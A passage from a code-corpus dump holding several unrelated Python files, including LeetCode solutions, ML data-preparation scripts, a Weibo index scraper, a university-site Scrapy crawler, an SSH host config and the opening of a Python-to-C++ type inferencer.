trainset.debug_getitem__()","sub_path":"vggish_datasets.py","file_name":"vggish_datasets.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"592526574","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/9/25 7:33 PM\n# @Author : zhongch4g\n# @Site : \n# @File : 300. Longest Increasing Subsequence.py\n# @Software: IntelliJ IDEA\n\n\nclass Solution:\n def lengthOfLIS(self, nums) -> int:\n length = len(nums)\n if length == 0:\n return 0\n\n f = [0 for i in range(length)]\n longest = 0\n # print a path\n pi = [0 for i in range(length)]\n end_point = 0\n for i in range(length):\n f[i] = 1\n pi[i] = -1\n for j in range(i + 1):\n if nums[j] < nums[i]:\n f[i] = max(f[j] + 1, f[i])\n if f[i] == f[j] + 1:\n pi[i] = j\n longest = max(longest, f[i])\n if longest == f[i]:\n end_point = i\n res = [0 for i in range(longest)]\n for i in range(longest - 1, -1, -1):\n res[i] = nums[end_point]\n end_point = pi[end_point]\n for i in range(longest):\n print(res[i])\n return longest\n\n","sub_path":"LeetCode/300. Longest Increasing Subsequence.py","file_name":"300. Longest Increasing Subsequence.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"316870078","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport random\nfrom typing import Iterable\nfrom objects import *\nfrom objects._session import session\nfrom utils.config import Config\nfrom nets.tasks.e2e import E2ENet\n\n\nclass E2EBeam(Beam):\n def __init__(self, *args, **kwargs):\n self.timestamp = ''\n self.duration, self.fps, self.num_bricks, self.num_frames = 0, 0, 0, 0\n self.resolution = [0, 0]\n super().__init__(E2EBrick, *args, **kwargs)\n\n @property\n def valid(self) -> bool:\n return abs(self.beam.config['constants']['runningFps'] - self.fps) / self.beam.config['constants']['runningFps'] < 0.1\n\n\nclass E2EBrick(Brick):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n @property\n def valid(self) -> bool:\n steering, accel = self.truth['steering'], self.truth['accel']\n if steering is None or accel is None:\n validity = False\n else:\n validity = -90. <= steering <= 90. and -20. <= accel <= 20.\n return validity\n\n def get_input(self):\n input_data = session.read_hdf5(filepath=self.beam.hdf5_path,\n dataset_id=self.beam.dataset_id,\n start_frame=self.frame - self.beam.config['constants']['runningFps'] + 1,\n end_frame=self.frame + 1)\n return torch.FloatTensor(input_data)\n\n def get_metadata(self):\n rand_state = random.getstate()\n random.seed()\n\n action = random.choice(self.metadata['actions'])\n steering_meta = -1\n\n if 'rightTurn' == action:\n steering_meta = 1\n elif 'leftTurn' == action:\n steering_meta = 2\n elif 'None' == action:\n steering_meta = 0\n\n random.setstate(rand_state)\n return torch.LongTensor(np.array([steering_meta]))\n\n def get_truth(self):\n steering, accel, motor = self.truth['steering'], self.truth['accel'], self.truth['motor']\n return torch.FloatTensor(np.array([steering, accel, motor]))\n\n\nclass E2EDataset(Dataset):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._stds = torch.FloatTensor(self._normalize_bricks(self.train_bricks))\n\n def _normalize_bricks(self, train_bricks=None):\n train_bricks = train_bricks or self.train_bricks\n steering = np.array([brick.truth['steering'] for brick in train_bricks])\n accel = np.array([brick.truth['accel'] for brick in train_bricks])\n motor = np.array([brick.truth['motor'] for brick in train_bricks])\n return np.array([np.std(steering), np.std(accel), np.std(motor)])\n\n def get_posthook(self, input, metadata, truth):\n return input, metadata, truth / self._stds\n\n def load_beam(self, filepath: str) -> Iterable[Brick]:\n beam = E2EBeam(filepath=filepath, config=self.config)\n bricks = beam.get_bricks(exclude_invalid=True,\n sort_by=lambda brick: brick.frame,\n filter_by=lambda brick: (brick.frame >= beam.config['constants']['inputFrames']),\n filter_posthook=lambda bricks: bricks[:-1])\n return bricks\n\n\nclass E2ETask(Task):\n def __init__(self, name: str, config: Config, load_dataset=True):\n dataset = E2EDataset(config=config, dirpath=config['tasks']['e2e']['dataset']['dirPath']) if load_dataset else None\n opt_kwargs = {'eps': 1e-4}\n super().__init__(name, config, dataset, E2ENet, nn.MSELoss, optim.Adam, opt_kwargs=opt_kwargs)\n\n\nTask = E2ETask\n","sub_path":"tasks/e2e.py","file_name":"e2e.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"8510894","text":"#!/root/anaconda3/envs/kalditorch/bin/python\n\n\n\n#----- import packages\n\nimport argparse\nimport os\nimport sys\nimport pathlib\nimport re\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport time\n\n\nif __name__ == \"__main__\":\n start = time.time()\n parser = argparse.ArgumentParser(description='This program process the data from Siwis \\\n database (https://www.unige.ch/lettres/linguistique/research/latl/siwis/database/) and Musan dataset \\\n (https://www.openslr.org/17/) in order to develop an End-to-End system for signal denoising.')\n\n parser.add_argument('--main_path', type=str, required=True,\n help='Absolute path to the folder that contain SIWIS and MUSAN datasets.')\n parser.add_argument('--lang', type=list, default=['EN'],\n help='SIWIS contains different languages: English, Italian, French, Dutch. Default system use only English audios.')\n parser.add_argument('--min_length', type=float, required=True,\n help='The minimum duration for the audio files to be considered from the system.')\n parser.add_argument('--test_size', type=float, default=.1,\n help='Size for test set audios.')\n parser.add_argument('--verbose', default=False, action='store_true')\n\n args = parser.parse_args()\n \n #----- paths\n # SIWIS database https://www.unige.ch/lettres/linguistique/research/latl/siwis/database/\n # MUSAN dataset https://www.openslr.org/17/\n \n clean_audios = 'siwis_database/wav/'\n noise_audios = 'musan'\n info_clean_audios = 'siwis_database/info'\n \n clean_audios_path = os.path.join(args.main_path, clean_audios)\n noise_audios_path = os.path.join(args.main_path, noise_audios)\n print('\\n\\nClean audios (siwis_database) directory: {}'.format(clean_audios_path))\n print('Noise audios (musan dataset) directory: {}'.format(noise_audios_path))\n \n #----- utt2duration.scp file\n if args.verbose:\n print('\\n\\nChecking utt2duration.scp presence...')\n\n if not os.path.isdir('../data'):\n if args.verbose:\n print('Making data dir...')\n os.makedirs('../data')\n\n if not os.path.isfile('../data/utt2duration.scp'):\n if args.verbose:\n print('Making utt2duration.scp...')\n utt2duration = {}\n\n info_dir = os.listdir(os.path.join(args.main_path, info_clean_audios))\n audio_length_files = [elem for elem in info_dir if re.search('_audio_length.txt', elem)]\n\n with open('../data/utt2duration.scp', 'w') as outfile:\n durations = []\n for file in audio_length_files:\n for line in open(os.path.join(args.main_path, info_clean_audios, file)):\n utt, duration = line.rstrip().split()\n utt = utt.replace('.wav', '')\n durations.append(float(duration))\n outfile.write('{} {}\\n'.format(utt, duration))\n utt2duration[utt] = float(duration)\n\n outfile.close()\n if args.verbose:\n print('Clean audios measures:')\n print('Max: {}\\nMin: {}\\nMean: {}\\nMedian: {}'.format(max(durations), min(durations),\n np.mean(durations), np.median(durations)))\n else:\n utt2duration = {}\n for line in open('../data/utt2duration.scp'):\n utt, duration = line.rstrip().split()\n utt2duration[utt] = float(duration)\n if args.verbose:\n print('/data/utt2duration.scp file already exists.')\n \n \n \n #----- train and test wav.scp\n utts, paths, spks = [], [], []\n \n for language in args.lang:\n for folder in os.listdir(os.path.join(clean_audios_path, language)):\n for utt in os.listdir(os.path.join(clean_audios_path, language, folder)):\n tmp = os.path.join(clean_audios_path, language, folder, utt)\n if pathlib.Path(tmp).suffix == '.wav':\n if utt2duration[utt.replace('.wav', '')] > args.min_length:\n utts.append(utt.replace('.wav', ''))\n spks.append(utt.split('_')[2])\n paths.append(tmp)\n\n X_train, X_test, y_train, y_test = train_test_split(np.array(paths), np.array(utts), test_size = args.test_size, stratify = spks)\n \n if args.verbose:\n print('\\n\\nChecking train and test wav.scp presence...')\n if not os.path.isdir('../data/train'):\n os.makedirs('../data/train')\n\n if not os.path.isfile('../data/train/wav.scp'):\n if args.verbose:\n print('Making train...')\n with open('../data/train/wav.scp', 'w') as outfile:\n for train_counter, line in enumerate(np.column_stack((y_train, X_train))):\n outfile.write('{} {}\\n'.format(line[0], line[1]))\n\n outfile.close()\n\n else:\n if args.verbose:\n print('/data/train/wav.scp already exists.')\n\n if not os.path.isdir('../data/test'):\n os.makedirs('../data/test')\n\n if not os.path.isfile('../data/test/wav.scp'):\n if args.verbose:\n print('Making test...')\n with open('/data/test/wav.scp', 'w') as outfile:\n for test_counter, line in enumerate(np.column_stack((y_test, X_test))):\n outfile.write('{} {}\\n'.format(line[0], line[1]))\n\n outfile.close()\n if args.verbose:\n print('Detected {} audio files'.format(train_counter+test_counter))\n print('{} in train'.format(train_counter))\n print('{} in test'.format(test_counter))\n\n else:\n if args.verbose:\n print('/data/test/wav.scp already exists.')\n \n #----- noise wav.scp\n if args.verbose:\n print('\\n\\nChecking for noise wav.scp presence...')\n\n if not os.path.isfile('../data/musan_noise.scp'):\n\n if args.verbose:\n print('Make musan.scp')\n counter = {}\n\n for folder in os.listdir(noise_audios_path):\n if os.path.isdir(os.path.join(noise_audios_path, folder)):\n if args.verbose:\n print('Making musan_{}.scp'.format(folder))\n with open('../data/musan_{}.scp'.format(folder), 'w') as file:\n for subfolder in os.listdir(os.path.join(noise_audios_path, folder)):\n if os.path.isdir(os.path.join(noise_audios_path, folder, subfolder)):\n for utt in os.listdir(os.path.join(noise_audios_path, folder, subfolder)):\n if utt.endswith('.wav'):\n file.write('{} {}\\n'.format(utt.replace('.wav', ''),\n os.path.join(noise_audios_path, folder, subfolder, utt)))\n if folder in counter:\n counter[folder] += 1\n else:\n counter[folder] = 1\n\n file.close()\n if args.verbose:\n print('Detected {} noise audios'.format(sum(counter.values())))\n print(counter)\n\n else:\n if args.verbose:\n print('musan noise wav files already exists.')\n \n #----- utt2spk.scp\n if args.verbose:\n print('\\n\\nChecking for utt2spk.scp presence...')\n\n if not os.path.isfile('../data/utt2spk.scp'):\n\n list_of_speakers = set()\n with open('../data/utt2spk.scp', 'w') as file:\n for line in open('../data/train/wav.scp'):\n utt, path = line.split()\n spk = utt.split('_')[2]\n list_of_speakers.add(spk)\n file.write('{} {}\\n'.format(utt, spk))\n\n for line in open('../data/test/wav.scp'):\n utt, path = line.split()\n spk = utt.split('_')[2]\n list_of_speakers.add(spk)\n file.write('{} {}\\n'.format(utt, spk))\n\n file.close()\n if args.verbose:\n print('{} speakers'.format(len(list_of_speakers)))\n\n else:\n if args.verbose:\n print('/data/utt2spk.scp already exists.')\n end = time.time()\n \n print('{} executed in {:.2f} s'.format(sys.argv[0], (end-start)))","sub_path":"pyscripts/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":8337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"277969704","text":"# Runtime: 216 ms, faster than 57.96% of Python online submissions for Number of Equivalent Domino Pairs.\n# Memory Usage: 24.1 MB, less than 100.00% of Python online submissions for Number of Equivalent Domino Pairs.\n\nclass Solution(object):\n def numEquivDominoPairs(self, dominoes):\n \"\"\"\n :type dominoes: List[List[int]]\n :rtype: int\n \"\"\"\n \n d = {}\n for i in dominoes:\n mn = min(i[0],i[1])\n mx = max(i[0],i[1])\n domino = (mn, mx)\n d[domino] = d.get(domino,0) + 1\n \n ans = 0\n for i in d:\n ans += d[i] * (d[i] - 1) / 2\n \n return ans","sub_path":"Leetcode/Arrays/Easy/1128_number_of_equivalent_domino_pairs.py","file_name":"1128_number_of_equivalent_domino_pairs.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"503478477","text":"\n\nfrom xai.brain.wordbase.nouns._duty import _DUTY\n\n#calss header\nclass _DUTIES(_DUTY, ):\n\tdef __init__(self,): \n\t\t_DUTY.__init__(self)\n\t\tself.name = \"DUTIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"duty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_duties.py","file_name":"_duties.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"123421980","text":"\nfrom __future__ import print_function\nimport numpy as np\nimport random\nimport datetime\nimport argparse\nimport matplotlib as mpl\nmpl.use('Agg', warn=False)\nimport matplotlib.pyplot as plt\nfrom nn_mnist_jellyfish import NeuralNetwork\nimport mnist\nimport utils\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-n', action=\"store\", dest=\"mnist_number\")\nparser.add_argument('-i', action=\"store\", dest=\"iterations\", default=25000, help=\"default: 25000\")\nargs = parser.parse_args()\nmnist_number = int(args.mnist_number)\niterations = int(args.iterations)\n\n# images choice indexes = [181, 100, 333, 100, 3282, 5239, 5070, 893, 2117, 5712]\n\npf = lambda x: (1 / (1 + np.exp(-1 * 10 * x)) - .5) * 1.8 + .05\nnn = NeuralNetwork(strength_function=pf)\n\nimgs = mnist.get_imgs_by_number(mnist_number)\ni = random.choice(range(len(imgs)))\nimg = imgs[i][1]\nprint('%s: %s' % (mnist_number, i))\n\nstart_time = datetime.datetime.now()\n\nplotting_strength = True\nif plotting_strength: strength_stats = []\n\nfor i in range(iterations):\n nn.propagate_once(img)\n if plotting_strength:\n if i % 10 == 0: strength_stats.append(nn.stats()['strength'])\n\nend_time = datetime.datetime.now()\nprint('start time:', start_time)\nprint('stop time: ', end_time)\n\nif plotting_strength:\n plt.plot(strength_stats)\n plt.savefig('./png/nn_mnist_jellyfish_%s.png' % mnist_number)\n\nutils.write_pickle(nn.connections_matrix, './pkl/nn_mnist_jellyfish_%s.pkl' % mnist_number)\n\n","sub_path":"backup/nn_mnist_jellyfish_train.py","file_name":"nn_mnist_jellyfish_train.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"223059672","text":"# coding=utf-8\nimport json\nimport os\nfrom urllib import parse\n\nimport requests\nimport xlrd\n\nRootdir = os.path.abspath(os.path.dirname(os.getcwd()))\nExceldir = Rootdir + r\"\\Dataset\\播放社交全.xls\"\nSheet = \"Sheet1\"\ndate_start = \"2014-01-01\"\ndate_stop = \"2017-07-09\"\n\n\ndef read_xls_file(directory, sheet):\n xls = xlrd.open_workbook(directory)\n s = xls.sheet_by_name(sheet)\n cols = s.col_values(0)\n return cols\n\n\ndef savejson(soapname, data):\n fl = open('../OutPut/figures/' + soapname + '.json', 'w')\n fl.write(json.dumps(data, ensure_ascii=False, indent=2))\n fl.close()\n\n\ndef search_name(name):\n url_format = \"http://data.weibo.com/index/ajax/hotword?word={}&flag=nolike&_t=0\"\n\n # 伪造cookie\n cookie_header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36\",\n \"Referer\": \"http://data.weibo.com/index?sudaref=www.google.com\"\n }\n # 汉字转为%编码\n urlname = parse.quote(name)\n # 将{}替换为关键词\n first_requests = url_format.format(urlname)\n print(first_requests)\n\n codes = requests.get(first_requests, headers=cookie_header).json()\n\n print(codes)\n\n # 获取关键词代码\n ids = codes[\"data\"][\"id\"]\n\n # 伪造完整包头\n header = {\n \"Connection\": \"keep-alive\",\n \"Accept-Encoding\": \"gzip, deflate, sdch\",\n \"Accept\": \"*/*\",\n \"User-Agent\": \"ksoap2-android/2.6.0+\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n \"Referer\": \"http://data.weibo.com/index/hotword?wid={}&wname={}\".format(ids, urlname),\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Host\": \"data.weibo.com\"\n }\n\n # 获取日期\n date_url = \"http://data.weibo.com/index/ajax/getdate?month=1&__rnd=1498190033389\"\n dc = requests.get(date_url, headers=header).json()\n edate, sdate = dc[\"edate\"], dc[\"sdate\"]\n print(dc)\n # 数据返回\n # 指定月份指数数据\n # getchartdata?month=3&_rnd=时间戳\n # ?month为月份跨度\n\n # 日期数据\n # getdate?month=3&_rnd=时间戳\n # ?month为月份跨度\n print(codes)\n codes = requests.get(\"http://data.weibo.com/index/ajax/getchartdata?wid={}&sdate=2017-01-01&edate=2017-10-30\".format(ids, sdate, edate), headers=header).json()\n\n return codes\n\n # 指定日期区间获取微指数数据url\n # http://data.weibo.com/index/ajax/getchartdata?wid=1061704100000146164&sdate=2017-09-01&edate=2017-09-07&__rnd=1504856390847\n # sdate起始日期\n # edate截止日期\n # 伪造包头Referer格式\n # http://data.weibo.com/index/hotword?wid=1061704100000146164&wname=%E4%BA%BA%E6%B0%91%E7%9A%84%E5%90%8D%E4%B9%89\n # &wid为关键词代码\n # &wname为%格式化后的关键词\n\n\nif __name__ == \"__main__\":\n # 自动爬取新浪微博微指数,结果保存于Output/14to17\n dataless = [\"女管家\", \"飘洋过海来看你\", \"守护丽人\"]\n figures = {\"杨幂\", \"刘涛\"}\n for figure in figures:\n savejson(figure, search_name(figure))\n # 以上为未收录数据\n # presoap = [\"楚乔传\", \"醉玲珑\", \"我的前半生\", \"上古情歌\"]\n # for soap in presoap:\n # if os.path.exists('../OutPut/14to17/' + soap + '.json'):\n # print(soap + \"已保存过\")\n # continue\n # if soap == \"\" or dataless.__contains__(soap):\n # continue\n # savejson(soap, search_name(soap))\n # print(soap + \"已保存\")\n\n # print(\"已完成\")\n # for soap in read_xls_file(Exceldir, Sheet):\n # if os.path.exists('../OutPut/14to17/' + soap + '.json'):\n # print(soap + \"已保存过\")\n # continue\n # if soap == \"\" or dataless.__contains__(soap):\n # # 爱情公寓四未收录,以爱情公寓为关键词查询\n # continue\n # savejson(soap, search_name(soap))\n # print(soap + \"已保存\")\n print(\"已完成\")\n","sub_path":"Weibo/WeiIndex.py","file_name":"WeiIndex.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"476494772","text":"#!/usr/bin/env python\n\nimport time\nprint(time.tzname)\n\n# print(\"starting...\", end='', flush=True)\n# time.sleep(1.5)\n# print('done')\n\n# 8/14/2012\nfrom datetime import date, timedelta\n\nisabelle_bd = date(2012, 8, 14)\ntoday = date.today()\n\nprint(isabelle_bd, today)\n\nelapsed = today - isabelle_bd\n\nyears, days = divmod(elapsed.days, 365)\n\nprint(\"Isabelle is {} years and {} days old\".format(\n years, days\n))\n\ntwo_weeks = timedelta(14, 7200)\n\nthen = today + two_weeks\n\nprint(then)\n\n","sub_path":"dates_and_times.py","file_name":"dates_and_times.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"351210870","text":"import os\nimport re\n\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nimport w3lib.url\nimport mimetypes\n\n\nclass FullSpider(CrawlSpider):\n name = 'FullSpider'\n allowed_domains = ['iitg.ernet.in']\n\n dict_extensions = {\n 'document': {'.doc', '.docx', '.pdf', '.ppt','.pwz', '.pptx', '.odt', '.ott', '.rtf', '.txt'},\n 'image': {'.jpeg', '.jpg', '.jpe', '.png', '.tif', '.tiff', '.gif', '.webp', '.svg', '.bmp'},\n }\n\n repo_links = re.compile(\n \".*intranet\\.iitg\\.ernet\\.in/repo/.*|.*jatinga\\.iitg\\.ernet\\.in/~csesoftwarerepo/.*\"\n )\n\n if not os.path.exists('Links/Full/responsed'):\n os.makedirs('Links/Full/responsed')\n\n if not os.path.exists('Links/Full/found'):\n os.makedirs('Links/Full/found')\n\n content_link_file = open(r'Links/Full/responsed/content_links.txt', 'a+')\n doc_link_file = open(r'Links/Full/responsed/doc_links.txt', 'a+')\n image_link_file = open(r'Links/Full/responsed/image_links.txt', 'a+')\n other_link_file = open(r'Links/Full/responsed/other_links.txt', 'a+')\n repo_link_file = open(r'Links/Full/responsed/repo_links.txt', 'a+')\n\n name_link_file = open(r'Links/Full/found/name_links.txt', 'a+')\n doc_name_link_file = open(r'Links/Full/found/doc_name_links.txt', 'a+')\n image_name_link_file = open(r'Links/Full/found/image_name_links.txt', 'a+')\n other_name_link_file = open(r'Links/Full/found/other_name_links.txt', 'a+')\n repo_name_link_file = open(r'Links/Full/found/repo_name_links.txt', 'a+')\n\n start_urls = [\n 'http://intranet.iitg.ernet.in',\n 'http://local.iitg.ernet.in',\n 'http://www.iitg.ernet.in'\n ]\n rules = (Rule(LinkExtractor(allow='iitg.ernet\\.in',\n deny=('intranet\\.iitg\\.ernet\\.in/cclrs/',\n 'csea\\.iitg\\.ernet\\.in/csea/Public/web_new/index\\.php/activities/',\n 'intranet\\.iitg\\.ernet\\.in/eventcal/',\n 'shilloi\\.iitg\\.ernet\\.in/~hss/reservation/',\n 'intranet\\.iitg\\.ernet\\.in/news/user/login\\?',\n 'local\\.iitg\\.ernet\\.in/node/46/',\n 'jatinga\\.iitg\\.ernet\\.in/~dppc/resources/resources/',\n ),\n canonicalize=True,\n deny_extensions=(),\n ),\n follow=True,\n # process_request='lets_see',\n process_links='print_before_requesting',\n callback='parse_item'\n ),\n )\n\n def print_before_requesting(self, links):\n\n for i in range(len(links)):\n clean_url = w3lib.url.url_query_cleaner(links[i].url)\n links[i].url = clean_url\n (ty, en) = mimetypes.guess_type(clean_url)\n ext2 = ''\n if ty is not None:\n ext2 = mimetypes.guess_extension(type=ty)\n\n if ext2 in FullSpider.dict_extensions['document']:\n FullSpider.doc_name_link_file.write(clean_url + '\\n')\n elif ext2 in FullSpider.dict_extensions['image']:\n FullSpider.image_name_link_file.write(clean_url + '\\n')\n elif FullSpider.repo_links.match(clean_url):\n FullSpider.repo_name_link_file.write(clean_url + '\\n')\n else:\n FullSpider.name_link_file.write(clean_url + '\\n')\n FullSpider.other_name_link_file.write(clean_url + '\\n')\n return links\n\n def lets_see(self, request):\n FullSpider.other_link_file.write(request.url + '\\n')\n return request\n\n def parse_item(self, response):\n\n # FullSpider.other_link_file.write(response.request.headers.get('Referer', None) + '\\n')\n ext = mimetypes.guess_extension(response.headers['content-type'])\n\n if ext in FullSpider.dict_extensions['document']:\n FullSpider.doc_link_file.write(response.url + '\\n')\n elif ext in FullSpider.dict_extensions['image']:\n FullSpider.image_link_file.write(response.url + '\\n')\n elif FullSpider.repo_links.match(response.url):\n FullSpider.repo_link_file.write(response.url + '\\n')\n else:\n FullSpider.content_link_file.write(response.url + '\\n')\n\n FullSpider.other_link_file.write(response.url + '\\n')\n return None\n","sub_path":"IITGSearch/spiders/FullSpider.py","file_name":"FullSpider.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"456607183","text":"class Solution:\n def isMatch(self, s, p):\n \tdp=[[False for x in range(len(p)+1)] for x in range(len(s)+1)]\n \tdp[0][0]=True\n \tfor j in range(0,len(p)):\n \t\tif p[j]=='*':\n \t\t\tdp[0][j+1]=dp[0][j-1]\n \tfor i in range(0,len(s)):\n \t\tfor j in range(0,len(p)):\n \t\t\tif p[j]=='*':\n \t\t\t\tif dp[i+1][j-1]:\n \t\t\t\t\tdp[i+1][j+1]=True\n \t\t\t\telif dp[i][j+1] and (p[j-1]=='.' or s[i]==p[j-1]):\n \t\t\t\t\tdp[i+1][j+1]=True\t \t\t\t\n \t\t\telse:\n \t\t\t\tif dp[i][j]==True and (s[i]==p[j] or p[j]=='.'):\n \t\t\t\t\tdp[i+1][j+1]=True\n \treturn dp[len(s)][len(p)]\n\nsolution=Solution();\ns=\"cabbbbcbcacbabc\"\np=\".*b.*.ab*.*b*a*c\"\nprint(solution.isMatch(s,p))\n\n\n\n","sub_path":"LeetCode/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"641743922","text":"'''\nError codes from server side\n'''\nERR_MISSING_CERTIFICATE = 'Permission denied (publickey).\\n'\nERR_INVALID_USER = 'ERR_INVALID_USER'\nERR_NO_GROUPS = 'ERR_NO_GROUPS'\n\n'''\nSSH configurations used by client side scripts\n'''\nSHERIFF_HOSTNAME = '192.168.184.157'\nSHERIFF_HOST_PORT = '12345'\nSHERIFF_USERNAME = 'sheriff_server'\nSHERIFF_KEY = './sheriff_id_rsa'\n\n'''\nHost configurations\nHOST_AUTH_PRINCIPALS_DIR - Where the auth_principals directory will be located\nROOT_GROUPS - Names of all the ldap groups who will have access to the ssh host\n'''\nHOST_AUTH_PRINCIPALS_DIR = '/etc/ssh/auth_principals'\nROOT_GROUPS = ['Sheriff_GroupC']\n","sub_path":"ssh_host/setup/setup_config.py","file_name":"setup_config.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"426935377","text":"import unittest\nfrom nerium import Query, ResultFormat\nfrom tests.test_setup import jinja_query_name\ntry:\n # See tests/query/jinja.jinja for template format\n import jinjasql\n class TestJinjaTemplateResult(unittest.TestCase):\n EXPECTED = [{\n 'foo': 1.25,\n 'bar': '2017-09-09',\n 'quux': 'Hello',\n 'quuux': 'Björk Guðmundsdóttir'\n }, {\n 'foo': 42,\n 'bar': '2031-05-25',\n 'quux': 'yo',\n 'quuux': 'ƺƺƺƺ'\n }]\n DIFFERS = [{\n 'foo': 1.25,\n 'bar': '2017-09-09',\n 'quuux': 'Björk Guðmundsdóttir'\n }, {\n 'foo': 42,\n 'bar': '2031-05-25',\n 'quuux': 'ƺƺƺƺ'\n }]\n\n def test_jinja_results(self):\n loader = Query(jinja_query_name, hello=\"Hello\")\n result = loader.result_set()\n formatter = ResultFormat(result, format_='default')\n formatted_results = formatter.formatted_results()\n self.assertEqual(formatted_results, self.EXPECTED)\n \n def test_jinja_default(self):\n loader = Query(jinja_query_name)\n result = loader.result_set()\n formatter = ResultFormat(result, format_='default')\n formatted_results = formatter.formatted_results()\n self.assertEqual(formatted_results, self.DIFFERS) \nexcept ImportError:\n # can't test this module without jinjasql\n pass\n\n\n","sub_path":"tests/contrib/jinja_test.py","file_name":"jinja_test.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"284004432","text":"from enum import Enum\n\nimport lex\n\nclass Types(Enum):\n STRING = 0\n NUMBER = 1\n DICT = 2\n ARRAY = 3\n TUPLE = 4\n STRUCT = 5\n FUNCTION = 6\n\nPY2CTYPES = { Types.STRING : \"std::string\", \n Types.NUMBER : \"double\", \n Types.DICT : \"std::unordered_map\",\n Types.ARRAY : \"std::vector\",\n Types.TUPLE : \"std::tuple\" }\n\nclass TypeInfo(object):\n def __init__(self, base_type, key_type=None, value_type=None, value_types=None):\n self.base = base_type #base corresponds to one of the Types ENUM\n self.key = key_type #key is itself a TypeInfo object \n self.value = value_type #value is itself a TypeInfo object\n self.values = value_types #value_types is used when dealing with TUPLE types\n\n def execute(self):\n value = PY2CTYPES[self.base]\n if self.base == Types.ARRAY:\n value += \"<\" + self.value.execute() + \">\"\n elif self.base == Types.TUPLE:\n value += \"<\" \n value += \", \".join([vtype.execute() for vtype in self.values])\n value += \">\"\n elif self.base == Types.DICT:\n value += \"<\" + self.key.execute() + \", \" + self.value.execute() + \">\"\n return value\n\nclass TreeManager(object):\n def __init__(self, tree):\n self.tree = tree\n self.tree_index = {}\n self.leaf_nodes = []\n self.rewrites = []\n\n for node in self.tree:\n node.visit(self._visit)\n\n self.leaf_nodes.sort(key=lambda n: n.line_number())\n\n def rewrite(self):\n for rewriter in self.rewrites:\n rewriter.rewrite(self)\n\n def visit(self, nodetype, func):\n for node in self.tree_index.get(nodetype, []):\n func(node)\n\n def _visit(self, node):\n name = node.__class__.__name__\n if node.is_leafnode():\n self.leaf_nodes.append(node)\n\n if name in self.tree_index:\n self.tree_index[name].append(node)\n else:\n self.tree_index[name] = [node]\n\nclass MapContainmentRewrite(object):\n def __init__(self, rewriter):\n self.rewriter = rewriter\n\n def _visit(self, node):\n right_type = node.right_expr.typeinfo\n if node.op.token_type == lex.Tokens.IN:\n if right_type.base == Types.DICT:\n self.rewriter(node)\n\n def rewrite(self, tree_manager):\n tree_manager.visit(\"ConditionalTest\", self._visit)\n\nclass FunctionRewrite(object):\n def __init__(self, funcname, rewriter):\n self.funcname = funcname\n self.rewriter = rewriter\n\n def _visit(self, node):\n function_name = node.identifier.value.value\n if function_name == self.funcname:\n self.rewriter(node)\n \n def rewrite(self, tree_manager):\n tree_manager.visit(\"FunctionCall\", self._visit)\n\nclass MethodRewrite(object):\n def __init__(self, funcname, rewriter):\n self.funcname = funcname\n self.rewriter = rewriter\n\n def _visit(self, node):\n function_name = node.identifier.value.value\n \n try:\n inst_type = node.parent.left_expr\n except AttributeError:\n return\n\n if function_name == self.funcname:\n self.rewriter(node)\n\n def rewrite(self, tree_manager):\n tree_manager.visit(\"FunctionCall\", self._visit)\n\nclass Inferencer(object):\n \"\"\"\n Starting from the leaf nodes of the AST, work our way back up\n the tree while setting types on each node.\n\n Many nodes will be visited more than once. A path is followed backwards from each\n leaf node. Non-leaf nodes will derive a type when enough information is \n available.\n\n Functions imported from C++ must have their return types set manually\n in order for all types to be resolved properly.\n\n The 'imported_types' dictionary holds imported function names as its keys, and \n has TypeInfo objects as corresponding values.\n\n The Inferencer should be executed before any user-defined tree rewrites\n take place. This is so that tree rewrites can take advantage of type \n information in order to be more selective about what they rewrite.\n \"\"\"\n\n def __init__(self, tree_manager, imported_types, strategy):\n self.tree_manager = tree_manager\n self.imported_types = imported_types\n self.strategy = strategy\n\n def start(self):\n 